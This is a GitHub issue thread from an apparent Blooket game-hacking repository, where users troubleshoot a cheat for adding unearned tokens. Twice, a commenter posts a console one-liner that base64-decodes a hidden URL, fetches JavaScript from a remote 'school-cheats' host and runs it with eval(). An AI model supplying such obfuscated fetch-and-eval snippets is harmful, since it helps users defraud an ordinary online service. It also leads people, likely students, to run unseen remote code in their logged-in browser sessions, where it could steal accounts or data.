### ISSUE TITLE
Add Tokens is not working, again. 

### ISSUE THREAD

**Issue by CalebTheHero** [glixzzy/blooket-hack#481]

**Comment by GlizxyBoi** [comment]
if you alr did it it wont work again

**Comment by CalebTheHero** [comment]
> if you alr did it it wont work again

I paste it in the console and it still doesnt work

**Comment by GlizxyBoi** [comment]
go to your stats and if you have 0 it wont work ok

**Comment by CalebTheHero** [comment]
It has 500

**Comment by GlizxyBoi** [comment]
so you have to do it when you type how much you want like you only can do
500 as limit but when you do it refresh page and you have 500 coins easy

**Comment by Greenlio** [comment]
Doesn't work on the current SchoolCheats version. Go into the addTokens.js file and copy all the code then use that instead of the fetch() etc etc.

**Comment by GlizxyBoi** [comment]
oh your doing the wrong one pal do this:
fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbEFkZFRva2Vucy5qcw==')).then((res)
=> res.text().then((t) => eval(t)))

**Comment by Greenlio** [comment]
No, that's the wrong one @GlizxyBoi.

**Comment by GlizxyBoi** [comment]
fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbEFkZFRva2Vucy5qcw==')).then((res)
=> res.text().then((t) => eval(t))) do this ok

**Comment by GlizxyBoi** [comment]
did it work?
